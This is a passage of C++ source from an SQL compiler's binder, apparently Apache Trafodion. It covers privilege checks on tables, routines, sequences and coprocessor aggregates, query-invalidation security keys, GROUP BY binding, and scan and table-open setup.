privInterface(privMDLoc.data(), CmpCommon::diags(), PrivMgr::PRIV_INITIALIZED); PrivStatus retcode = STATUS_GOOD; // ==> Check privileges for tables used in the query. SqlTableOpenInfo * stoi = NULL ; OptSqlTableOpenInfo * optStoi = NULL; for(Int32 i=0; i<(Int32)bindWA->getStoiList().entries(); i++) { RemoveNATableEntryFromCache = FALSE ; // Initialize each time through loop optStoi = (bindWA->getStoiList())[i]; stoi = optStoi->getStoi(); NATable* tab = optStoi->getTable(); // System metadata tables do not, by default, have privileges stored in the // NATable structure. Go ahead and retrieve them now. 
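    // (Fetching them goes through the privilege manager and requires a
    //  temporary switch to the metadata compiler context; see
    //  switchCompiler()/switchBackCompiler() below.)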
PrivMgrUserPrivs *pPrivInfo = tab->getPrivInfo(); PrivMgrUserPrivs privInfo; if (!pPrivInfo) { CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges( tab->objectUid().get_value(), tab->getObjectType(), thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { tab->setRemoveFromCacheBNC(TRUE); bindWA->setFailedForPrivileges(TRUE); *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } pPrivInfo = &privInfo; } // Check each primary DML privilege to see if the query requires it. If // so, verify that the user has the privilege bool insertQIKeys = (QI_enabled && tab->getSecKeySet().entries() > 0); for (int_32 i = FIRST_DML_PRIV; i <= LAST_PRIMARY_DML_PRIV; i++) { if (stoi->getPrivAccess((PrivType)i)) { if (!pPrivInfo->hasPriv((PrivType)i) && !optStoi->checkColPriv((PrivType)i, pPrivInfo)) RemoveNATableEntryFromCache = TRUE; else if (insertQIKeys) findKeyAndInsertInOutputList(tab->getSecKeySet(),userHashValue,(PrivType)(i)); } } // wait until all the primary DML privileges have been checked before // setting failure information if ( RemoveNATableEntryFromCache ) { bindWA->setFailedForPrivileges( TRUE ); tab->setRemoveFromCacheBNC(TRUE); // To be removed by CmpMain before Compilation retry } } // for loop over tables in stoi list // ==> Check privileges for functions and procedures used in the query. NABoolean RemoveNARoutineEntryFromCache = FALSE ; if (bindWA->getUdrStoiList().entries()) { for(Int32 i=0; i<(Int32)bindWA->getUdrStoiList().entries(); i++) { // Privilege info for the user/routine combination is stored in the // NARoutine object. OptUdrOpenInfo *udrStoi = (bindWA->getUdrStoiList())[i]; NARoutine* rtn = udrStoi->getNARoutine(); PrivMgrUserPrivs *pPrivInfo = rtn->getPrivInfo(); NABoolean insertQIKeys = FALSE; if (QI_enabled && (rtn->getSecKeySet().entries() > 0)) insertQIKeys = TRUE; if (pPrivInfo == NULL) { RemoveNARoutineEntryFromCache = TRUE ; *CmpCommon::diags() << DgSqlCode( -1034 ); } // Verify that the user has execute priv else { if (pPrivInfo->hasPriv(EXECUTE_PRIV)) { // do this only if QI is enabled and object has security keys defined if ( insertQIKeys ) findKeyAndInsertInOutputList(rtn->getSecKeySet(), userHashValue, EXECUTE_PRIV); } // plan requires privilege but user has none, report an error else { RemoveNARoutineEntryFromCache = TRUE ; *CmpCommon::diags() << DgSqlCode( -4482 ) << DgString0( "EXECUTE" ) << DgString1( udrStoi->getUdrName() ); } } if ( RemoveNARoutineEntryFromCache ) { bindWA->setFailedForPrivileges(TRUE); // If routine exists in cache, add it to the list to remove NARoutineDB *pRoutineDBCache = bindWA->getSchemaDB()->getNARoutineDB(); NARoutineDBKey key(rtn->getSqlName(), bindWA->wHeap()); NARoutine *cachedNARoutine = pRoutineDBCache->get(bindWA, &key); if (cachedNARoutine != NULL) pRoutineDBCache->moveRoutineToDeleteList(cachedNARoutine, &key); } } // for loop over UDRs } // end if any UDRs. // ==> Check privs on any CoprocAggrs used in the query. 
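  // (A coprocessor aggregate, e.g. a count(*) pushed down to the HBase
  //  coprocessor, still needs SELECT privilege on the underlying table;
  //  that is what the loop below checks.)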
for (Int32 i=0; i<(Int32)bindWA->getCoProcAggrList().entries(); i++) { RemoveNATableEntryFromCache = FALSE ; // Initialize each time through loop ExeUtilHbaseCoProcAggr *coProcAggr = (bindWA->getCoProcAggrList())[i]; NATable* tab = bindWA->getSchemaDB()->getNATableDB()-> get(coProcAggr->getCorrName(), bindWA, NULL); Int32 numSecKeys = 0; // Privilege info for the user/table combination is stored in the NATable // object. PrivMgrUserPrivs* pPrivInfo = tab->getPrivInfo(); PrivMgrUserPrivs privInfo; // System metadata tables do not, by default, have privileges stored in the // NATable structure. Go ahead and retrieve them now. if (!pPrivInfo) { CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges( tab->objectUid().get_value(), tab->getObjectType(), thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { bindWA->setFailedForPrivileges( TRUE ); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } pPrivInfo = &privInfo; } // Verify that the user has select priv // Select priv is needed for EXPLAIN requests, so no special check is done NABoolean insertQIKeys = FALSE; if (QI_enabled && (tab->getSecKeySet().entries()) > 0) insertQIKeys = TRUE; if (pPrivInfo->hasPriv(SELECT_PRIV)) { // do this only if QI is enabled and object has security keys defined if ( insertQIKeys ) findKeyAndInsertInOutputList(tab->getSecKeySet(), userHashValue, SELECT_PRIV ); } // plan requires privilege but user has none, report an error else { bindWA->setFailedForPrivileges( TRUE ); tab->setRemoveFromCacheBNC(TRUE); // To be removed by CmpMain before Compilation retry *CmpCommon::diags() << DgSqlCode( -4481 ) << DgString0( "SELECT" ) << DgString1( tab->getTableName().getQualifiedNameAsAnsiString() ); } } // for loop over coprocs // ==> Check privs on any sequence generators used in the query. for (Int32 i=0; i<(Int32)bindWA->getSeqValList().entries(); i++) { SequenceValue *seqVal = (bindWA->getSeqValList())[i]; NATable* tab = const_cast<NATable*>(seqVal->getNATable()); // No need to save priv info in NATable object representing a sequence; // these NATables are not cached. PrivMgrUserPrivs privInfo; CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges(tab->objectUid().get_value(), COM_SEQUENCE_GENERATOR_OBJECT, thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { bindWA->setFailedForPrivileges(TRUE); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } // Verify that the user has usage priv if (privInfo.hasPriv(USAGE_PRIV)) { // Do we need to add any QI keys to the plan? 
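      // (At present no ComSecurityKey is inserted into the plan for
      //  sequence generators, unlike the table and routine checks above.)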
} // plan requires privilege but user has none, report an error else { bindWA->setFailedForPrivileges( TRUE ); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -4491 ) << DgString0( "USAGE" ) << DgString1( tab->getTableName().getQualifiedNameAsAnsiString()); } } // for loop over sequences return !bindWA->failedForPrivileges() ; } void RelRoot::findKeyAndInsertInOutputList( ComSecurityKeySet KeysForTab , const uint32_t userHashValue , const PrivType which ) { ComSecurityKey dummyKey; ComQIActionType objectActionType = dummyKey.convertBitmapToQIActionType ( which, ComSecurityKey::OBJECT_IS_OBJECT ); ComSecurityKey * UserSchemaKey = NULL; ComSecurityKey * UserObjectKey = NULL; ComSecurityKey * RoleSchemaKey = NULL; ComSecurityKey * RoleObjectKey = NULL; ComSecurityKey * BestKey = NULL; ComSecurityKey * thisKey = &(KeysForTab[0]); uint32_t hashValueOfPublic = 0; // NOTE: hashValueOfPublic will be the same for all keys, so we generate it only once. if ( KeysForTab.entries() > 0 ) hashValueOfPublic = thisKey->generateHash(PUBLIC_USER); // Traverse List looking for ANY appropriate ComSecurityKey for ( Int32 ii = 0; ii < (Int32)(KeysForTab.entries()); ii++ ) { thisKey = &(KeysForTab[ii]); if ( thisKey->getSecurityKeyType() == objectActionType ) { if ( thisKey->getSubjectHashValue() == hashValueOfPublic || thisKey->getSubjectHashValue() == userHashValue ) { if ( ! UserObjectKey ) UserObjectKey = thisKey; } else if ( ! RoleObjectKey ) RoleObjectKey = thisKey; } else {;} // Not right action type, just continue traversing. } if ( UserObjectKey ) BestKey = UserObjectKey ; else if ( RoleObjectKey ) BestKey = RoleObjectKey ; if ( BestKey == NULL) return; // Sometimes there aren't any security keys securityKeySet_.insert(*BestKey); uint32_t SubjHashValue = BestKey->getSubjectHashValue(); hashValueOfPublic = BestKey->generateHash(PUBLIC_USER); // Check whether this privilege was granted to PUBLIC. If so, nothing more to check. if ( SubjHashValue == hashValueOfPublic ) return; while ( SubjHashValue != userHashValue ) //While we see a ComSecurityKey for a Role { NABoolean found = FALSE; for ( Int32 ii = 0; ii < (Int32)(KeysForTab.entries()); ii++ ) { // If this ComSecurityKey is a GRANT type and the grantee (the object) // is the Role specified by SubjHashValue, then break out of inner loop. ComSecurityKey * thisKey = &(KeysForTab[ii]); if ( ( thisKey->getObjectHashValue() == SubjHashValue ) && ( (thisKey->getSecurityKeyType() == COM_QI_USER_GRANT_ROLE ) ) ) { securityKeySet_.insert(*thisKey); // Insert this GRANT type ComSecurityKey into the Plan found = TRUE; SubjHashValue = thisKey->getSubjectHashValue(); break; // We found the user or Role which granted the user the privilege } } // found should never be FALSE CMPASSERT(found) } } // ----------------------------------------------------------------------- // member functions for class GroupByAgg // ----------------------------------------------------------------------- RelExpr *GroupByAgg::bindNode(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON)); if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // add any aggregate functions found in the parent node(s) // BindScope *currScope = bindWA->getCurrentScope(); aggregateExpr_ += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); // // Bind the child nodes. 
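  // (lookAboveToDecideSubquery is turned on only while the child tree is
  //  being bound and is reset right after; judging by its name, it lets a
  //  subquery found in the child consider the scopes above this GROUP BY.)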
// currScope->context()->lookAboveToDecideSubquery() = TRUE; bindChildren(bindWA); currScope->context()->lookAboveToDecideSubquery() = FALSE; if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // QSTUFF NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); bindWA->getTablesInScope(xtnmList, &fmtdList); // can be removed when supporting aggregates on streams if (getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4162) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } if ((getGroupAttr()->isEmbeddedUpdateOrDelete()) || (bindWA->isEmbeddedIUDStatement())) { *CmpCommon::diags() << DgSqlCode(-4163) << DgString0(fmtdList) << (getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } // QSTUFF // if unresolved aggregate functions have been found in the children of the // Groupby node, that would mean that we are referencing aggregates before // the groupby operation is performed // if (checkUnresolvedAggregates(bindWA)) return this; // // Detach the item expression tree for the grouping column list, bind it, // convert it to a ValueIdSet, and attach it to the GroupByAgg node. // ItemExpr *groupExprTree = removeGroupExprTree(); if (groupExprTree) { currScope->context()->inGroupByClause() = TRUE; groupExprTree->convertToValueIdSet(groupExpr(), bindWA, ITM_ITEM_LIST); currScope->context()->inGroupByClause() = FALSE; if (bindWA->errStatus()) return this; ValueIdList groupByList(groupExpr()); for (CollIndex i = 0; i < groupByList.entries(); i++) { ValueId vid = groupByList[i]; vid.getItemExpr()->setIsGroupByExpr(TRUE); } if (((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) && (groupExprTree != NULL) && (getParentRootSelectList() != NULL)) { RETDesc * childRETDesc = child(0)->getRETDesc(); ItemExprList origSelectList(getParentRootSelectList(), bindWA->wHeap()); for (CollIndex i = 0; i < groupByList.entries(); i++) { ValueId vid = groupByList[i]; if((vid.getItemExpr()->getOperatorType() == ITM_SEL_INDEX)&& (((SelIndex*)(vid.getItemExpr()))->renamedColNameInGrbyClause())) { ULng32 indx = ((SelIndex*)(vid.getItemExpr()))->getSelIndex() - 1; if (origSelectList.entries() > indx && origSelectList[indx]->getOperatorType() == ITM_RENAME_COL) { const ColRefName &selectListColRefName = *((RenameCol *)origSelectList[indx])->getNewColRefName(); ColumnNameMap *baseColExpr = childRETDesc->findColumn(selectListColRefName); if (baseColExpr) { groupExpr().remove(vid); groupExpr().insert(baseColExpr->getValueId()); baseColExpr->getColumnDesc()->setGroupedFlag(); origSelectList[indx]->setInGroupByOrdinal(FALSE); } } } } if (getSelPredTree()) { ItemExpr * havingPred = (ItemExpr *) getSelPredTree(); // see if having expr refers to any renamed col in the select list. // that is NOT a name exposed by child RETDesc. // If it does, replace it with SelIndex. // For now, do this for special1 mode and only if the having // is a simple pred of the form: col <op> value. // Later, we can extend this to all kind of having pred by // traversing the having pred tree and replacing renamed cols. 
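          // Example of the pattern handled here (illustrative query only):
          //   select a as x, count(*) from t group by a having x > 10;
          // "x" is not a name exposed by the child RETDesc, so the
          // reference in the HAVING clause is replaced by the index of the
          // corresponding select list item.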
NABoolean replaced = FALSE; NABoolean notAllowedWithSelIndexInHaving = FALSE; replaceRenamedColInHavingWithSelIndex( bindWA, havingPred, origSelectList, replaced, notAllowedWithSelIndexInHaving,child(0)->getRETDesc()); if (bindWA->errStatus()) return this; if (replaced) { if (notAllowedWithSelIndexInHaving) { *CmpCommon::diags() << DgSqlCode(-4196) ; bindWA->setErrStatus(); return this; } setSelIndexInHaving(TRUE); } } setParentRootSelectList(NULL); } // Indicate that we are not in a scalar groupby. Any aggregate // functions found in the select list or having clause cannot // evaluate to NULL unless their argument is null. currScope->context()->inScalarGroupBy() = FALSE; } // // bind the having predicates and attach the resulting value id set // to the node (as a selection predicate on the groupby node) // ItemExpr *havingPred = removeSelPredTree(); if (havingPred && NOT selIndexInHaving()) { currScope->context()->inHavingClause() = TRUE; havingPred->convertToValueIdSet(selectionPred(), bindWA, ITM_AND); currScope->context()->inHavingClause() = FALSE; if (bindWA->errStatus()) return this; } // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; if ((havingPred) && (selIndexInHaving())) { addSelPredTree(havingPred); } // // Get the aggregate expressions from the list that has accumulated // in the current bind scope and clear the list in the bind scope -- // but first, if Tuple::bindNode()/checkTupleElementsAreAllScalar() // created this node, add the subquery aggregate expr // (Genesis 10-000221-6676). // if (aggregateExprTree_) { // only Binder, not Parser, should put anything here // CMPASSERT(bindWA->getCurrentScope()->context()->inTupleList()); CMPASSERT(aggregateExprTree_->nodeIsBound() || aggregateExprTree_->child(0)->nodeIsBound()); aggregateExprTree_ = aggregateExprTree_->bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; aggregateExpr_ += aggregateExprTree_->getValueId(); aggregateExprTree_ = NULL; } aggregateExpr_ += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); getRETDesc()->setGroupedFlag(); return boundExpr; } // GroupByAgg::bindNode() // ----------------------------------------------------------------------- // member functions for class Scan // ----------------------------------------------------------------------- //////////////////////////////////////////////////////////////////////// // A list of 'fabricated' hostvar representing the hostvars is generated // that will contain the primary key values. These primary key // values are retrieved at runtime from the cursor statement // specified in the 'current of' clause. A predicate of the // form 'where pkey1 = :pkey1 and pkey2 = :pkey2...' is attached // to the selection pred of this node. The hostvar values are // then passed in by the root node to its child and they reach // this node at runtime where the 'where' predicate is evaluated. //////////////////////////////////////////////////////////////////////// void Scan::bindUpdateCurrentOf(BindWA *bindWA, NABoolean updateQry) { ValueIdList keyList = getTableDesc()->getClusteringIndex()->getIndexKey(); ItemExpr * rootPtr = NULL; char hvName[30]; CollIndex i = 0; for (i = 0; i < keyList.entries(); i++) { ValueId vid = keyList[i]; // Fabricate a name for the i'th host variable, // make a hostvar,add it to pkeyHvarList. 
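    // For a two-column clustering key this loop produces a predicate of
    // the form (column names illustrative only):
    //   PKEY1 = _upd_pkey_HostVar0 AND PKEY2 = _upd_pkey_HostVar1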
sprintf(hvName,"_upd_pkey_HostVar%d",i); HostVar *hv = new(bindWA->wHeap()) HostVar(hvName, &vid.getType(), TRUE); hv->bindNode(bindWA); pkeyHvarList().insert(hv->getValueId()); // Build a 'pkey = pkey_hvar' predicate. ItemExpr * eqPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, vid.getItemExpr(), hv); if (!rootPtr) rootPtr = eqPred; else rootPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, rootPtr, eqPred); } // loop over all pkey columns if (updateQry) { ItemExpr * updCheckPtr = NULL; ValueIdList nonKeyColList; getTableDesc()->getClusteringIndex()->getNonKeyColumnList(nonKeyColList); for (i = 0; i < nonKeyColList.entries(); i++) { ValueId vid = nonKeyColList[i]; // Fabricate a name for the i'th host variable, // make a hostvar,add it to pkeyHvarList. sprintf(hvName,"_upd_col_HostVar%d",i); HostVar *hv = new(bindWA->wHeap()) HostVar(hvName, &vid.getType(), TRUE); hv->bindNode(bindWA); pkeyHvarList().insert(hv->getValueId()); // Build a 'col = col_hvar' predicate. ItemExpr * eqPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, vid.getItemExpr(), hv, TRUE); if (!updCheckPtr) updCheckPtr = eqPred; else updCheckPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, updCheckPtr, eqPred); } // loop over all pkey columns if (updCheckPtr) { updCheckPtr = new (bindWA->wHeap()) Case(NULL, new (bindWA->wHeap()) IfThenElse(updCheckPtr, new (bindWA->wHeap()) BoolVal(ITM_RETURN_TRUE), new (bindWA->wHeap()) BoolVal(ITM_RETURN_TRUE, new (bindWA->wHeap()) RaiseError(-(Lng32)EXE_CURSOR_UPDATE_CONFLICT)))); rootPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, rootPtr, updCheckPtr); } } // rootPtr->bindNode(bindWA); // add this new tree to the existing selection predicate addSelPredTree(rootPtr); bindSelf(bindWA); // just in case } // Scan::bindUpdateCurrentOf() // Every Scan and every GenericUpdate has its own stoi, // plus copies of some of these stoi's are copied to the BindWA // // The scan/gu stoi's will become ex_partn_access stoi's // // The stoiList copies in BindWA will have their security // checked in the binder, in RelRoot::checkPrivileges // // Stoi's must exist for every table/view/MV/index. // Stoi's that are not copied to the BindWA are those for which Ansi mandates // that no security checking be done (e.g., indexes). // OptSqlTableOpenInfo *setupStoi(OptSqlTableOpenInfo *&optStoi_, BindWA *bindWA, const RelExpr *re, const NATable *naTable, const CorrName &corrName, NABoolean noSecurityCheck) { // Get the PHYSICAL (non-Ansi/non-delimited) filename of the table or view. CMPASSERT(!naTable->getViewText() || naTable->getViewFileName()); NAString fileName( naTable->getViewText() ? 
(NAString)naTable->getViewFileName() : naTable->getClusteringIndex()-> getFileSetName().getQualifiedNameAsString(), bindWA->wHeap()); SqlTableOpenInfo * stoi_ = new (bindWA->wHeap()) SqlTableOpenInfo; optStoi_ = new(bindWA->wHeap()) OptSqlTableOpenInfo(stoi_, corrName, bindWA->wHeap()); stoi_->setFileName(convertNAString(fileName, bindWA->wHeap())); if (naTable->getIsSynonymTranslationDone()) { stoi_->setAnsiName(convertNAString( naTable->getSynonymReferenceName(), bindWA->wHeap())); } else { stoi_->setAnsiName(convertNAString( naTable->getTableName().getQualifiedNameAsAnsiString(), bindWA->wHeap())); } if(naTable->isUMDTable() || naTable->isSMDTable() || naTable->isMVUMDTable() || naTable->isTrigTempTable()) { stoi_->setIsMXMetadataTable(1); } if (NOT corrName.getCorrNameAsString().isNull()) { NABoolean corrNameSpecified = TRUE; if (corrNameSpecified) { stoi_->setCorrName(convertNAString( corrName.getCorrNameAsString(), bindWA->wHeap())); } } // Materialized-View is considered as a regular table stoi_->setSpecialTable(naTable->getSpecialType() != ExtendedQualName::NORMAL_TABLE && naTable->getSpecialType() != ExtendedQualName::MV_TABLE); stoi_->setIsView(naTable->getViewText() ? TRUE : FALSE); if (naTable->isHbaseTable()) stoi_->setIsHbase(TRUE); stoi_->setLocationSpecified(corrName.isLocationNameSpecified() || corrName.isPartitionNameSpecified() ); stoi_->setUtilityOpen(corrName.isUtilityOpenIdSpecified()); stoi_->setUtilityOpenId(corrName.getUtilityOpenId()); stoi_->setIsNSAOperation(corrName.isNSAOperation()); if (! naTable->getViewText()) stoi_->setIsAudited(naTable->getClusteringIndex()->isAudited()); switch (re->getOperatorType()) { case REL_UNARY_INSERT: case REL_LEAF_INSERT: stoi_->setInsertAccess(); break; case REL_UNARY_UPDATE: { stoi_->setUpdateAccess(); if (((GenericUpdate*)re)->isMerge()) stoi_->setInsertAccess(); } break; case REL_UNARY_DELETE: case REL_LEAF_DELETE: { stoi_->setDeleteAccess(); if (((GenericUpdate*)re)->isMerge()) stoi_->setInsertAccess(); if (((Delete*)re)->isFastDelete()) stoi_->setSelectAccess(); } break; case REL_SCAN: case REL_LOCK: case REL_UNLOCK: case REL_HBASE_COPROC_AGGR: stoi_->setSelectAccess(); break; case REL_EXE_UTIL: stoi_->setSelectAccess(); stoi_->setInsertAccess(); stoi_->setUpdateAccess(); stoi_->setDeleteAccess(); break; default: CMPASSERT(FALSE); } NABoolean validateTS = TRUE; if ((naTable->getClusteringIndex() && naTable->getClusteringIndex()->isSystemTable()) || (NOT validateTS)) stoi_->setValidateTimestamp(FALSE); else stoi_->setValidateTimestamp(TRUE); // MV -- // For INTERNAL REFRESH statements, leave only the insert on the MV itself. if (re->getInliningInfo().isAvoidSecurityCheck() || (bindWA->isBindingMvRefresh() && (!naTable->isAnMV() || !stoi_->getInsertAccess()))) { return NULL; } // In a SCAN, only the topmost view is inserted into BindWA StoiList // (thus there will be no security check on underlying views/basetables, // as Ansi says there shouldn't). if (re->getOperatorType() == REL_SCAN && bindWA->viewCount()) { return NULL; } // Genesis 10-980306-4309: // Ansi says not supposed to be any security check on referenced tables, // nor of course on indexes, RIs and temp tables which are not an Ansi // notion to begin with. 
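  // The special types excluded below (trigger temporary tables, IUD log
  // tables, index tables and resource forks) are exactly such internal
  // objects: no stoi is registered for them, so no privilege check occurs.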
if ((naTable->getSpecialType() == ExtendedQualName::TRIGTEMP_TABLE) || (naTable->getSpecialType() == ExtendedQualName::IUD_LOG_TABLE) || (naTable->getSpecialType() == ExtendedQualName::INDEX_TABLE) || (naTable->getSpecialType() == ExtendedQualName::RESOURCE_FORK)) { return NULL; } if (noSecurityCheck) { return NULL; } if (re->getOperator().match(REL_ANY_GEN_UPDATE)&& (((GenericUpdate*)re)->getUpdateCKorUniqueIndexKey())) { return NULL; } OptSqlTableOpenInfo *stoiInList = NULL; for (CollIndex i=0; i < bindWA->getStoiList().entries(); i++) if (strcmp(bindWA->getStoiList()[i]->getStoi()->fileName(), fileName) == 0) { stoiInList = bindWA->getStoiList()[i]; break; } if (!stoiInList) { stoiInList = new(bindWA->wHeap()) OptSqlTableOpenInfo( new (bindWA->wHeap()) SqlTableOpenInfo(*stoi_), corrName, bindWA->wHeap()); stoiInList->setTable((NATable*)naTable); bindWA->getStoiList().insert(stoiInList); bindWA->hbaseColUsageInfo()->insert((QualifiedName*)&naTable->getTableName()); } else { // This is conceptually equivalent to // stoiInList->AccessFlags |= stoi_->AccessFlags : if (stoi_->getInsertAccess()) stoiInList->getStoi()->setInsertAccess(); if (stoi_->getUpdateAccess()) stoiInList->getStoi()->setUpdateAccess(); if (stoi_->getDeleteAccess()) stoiInList->getStoi()->setDeleteAccess(); if (stoi_->getSelectAccess()) stoiInList->getStoi()->setSelectAccess(); } return stoiInList; } // setupStoi() //---------------------------------------------------------------------------- RelExpr *Scan::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // -- Triggers // Is this a Scan on a temporary table inside the action of a statement trigger? if (getTableName().isATriggerTransitionName(bindWA)) return buildTriggerTransitionTableView(bindWA); // Located in Inlining.cpp // -- MV // Is this a Scan on a log inside the select statement of a Materialized View? // If so - maybe we need to replace this Scan with some other RelExpr tree. // Ignore when inDDL() because the log may not exist yet. if (!bindWA->inDDL() && getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) { const MvBindContext *pMvBindContext = bindWA->getClosestMvBindContext(); if (NULL != pMvBindContext) { RelExpr *replacementTree = pMvBindContext->getReplacementFor(getTableName().getQualifiedNameObj()); if (replacementTree != NULL) { // We need to replace the Scan on the base table by some other tree. // Make sure this tree has the same name as the Scan. const CorrName& baseCorrName = getTableName(); replacementTree = new(bindWA->wHeap()) RenameTable(TRUE, replacementTree, baseCorrName); // Move any selection predicates on the Scan to the tree. replacementTree->addSelPredTree(removeSelPredTree()); // Bind the tree and return instead of the tree. return replacementTree->bindNode(bindWA); } } } bindChildren(bindWA); if (bindWA->errStatus()) return this; // Get the NATable for this object. // NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; // Set up stoi. bindWA->viewCount is altered during expanding the view. setupStoi(stoi_, bindWA, this, naTable, getTableName(), noSecurityCheck()); // If the object is a view, expand the view. 
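  // bindWA->bindView() below expands the view into its underlying select
  // tree; the bound view tree is what gets returned in place of this Scan.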
// if (naTable->getViewText()) { // Allow view on exception_table or any other special_table_name objects ComBoolean specialTableFlagOn = Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); if (specialTableFlagOn == FALSE) { Set_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); SQL_EXEC_SetParserFlagsForExSqlComp_Internal(ALLOW_SPECIALTABLETYPE); } RelExpr * boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr(), TRUE/*catmanCollectUsages*/); // QSTUFF // First we checked whether its a view and if so it must be updatable // when using it for stream access or an embedded update or delete if (!naTable->isUpdatable() && getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4206) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); // restore ALLOW_SPECIALTABLETYPE setting if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } if (!naTable->isUpdatable() && getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4151) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } // Second we make sure the the underlying base table is key sequenced // in case of embedded d/u and streams // -- for as long as we don't support entry sequenced tables if (boundView->getLeftmostScanNode()) { // this is not a "create view V(a) as values(3)" kind of a view const NATable * baseTable = boundView->getLeftmostScanNode()->getTableDesc()->getNATable(); if (getGroupAttr()->isStream()) { if (!baseTable->getClusteringIndex()->isKeySequenced()) { *CmpCommon::diags() << DgSqlCode(-4204) << DgTableName( baseTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } } if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ if (!baseTable->getClusteringIndex()->isKeySequenced()){ *CmpCommon::diags() << DgSqlCode(-4205) << DgTableName( baseTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } } } // QSTUFF // restore ALLOW_SPECIALTABLETYPE setting if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return boundView; } // -- MV // If this is the expanded tree pass during CREATE MV, expand the MV into // its SELECT tree, just like a regular view. // Do this only for incremental MVs, otherwise they may introduce unsupported // operators such as Union. if (naTable->isAnMV() && bindWA->isExpandMvTree() && naTable->getMVInfo(bindWA)->isIncremental()) { CMPASSERT(bindWA->inDDL()); return bindExpandedMaterializedView(bindWA, naTable); } // Do not allow to select from an un initialized MV if (naTable->isAnMV() && !bindWA->inDDL() && !bindWA->isBindingMvRefresh()) { if (naTable->verifyMvIsInitializedAndAvailable(bindWA)) return NULL; } // Allocate a TableDesc and attach it to the Scan node. // This call also allocates a RETDesc, attached to the BindScope, // which we want to attach also to the Scan. // // disable override schema for synonym NABoolean os = FALSE; if ( ( bindWA->overrideSchemaEnabled() ) && ( ! 
       naTable->getSynonymReferenceName().isNull() ) )
  {
    os = bindWA->getToOverrideSchema();
    bindWA->setToOverrideSchema(FALSE);
  }

  TableDesc * tableDesc = NULL;

  if ((NOT isHbaseScan()) || (! getTableDesc()))
  {
    tableDesc = bindWA->createTableDesc(naTable, getTableName(),
                                        FALSE, getHint());
  }
  else
    tableDesc = getTableDesc();

  // restore override schema setting
  if ( ( bindWA->overrideSchemaEnabled() )
    && ( ! naTable->getSynonymReferenceName().isNull() ) )
    bindWA->setToOverrideSchema(os);

  // before attaching, set the selectivity hint defined by the user for this
  // table
  if (tableDesc && getHint() &&
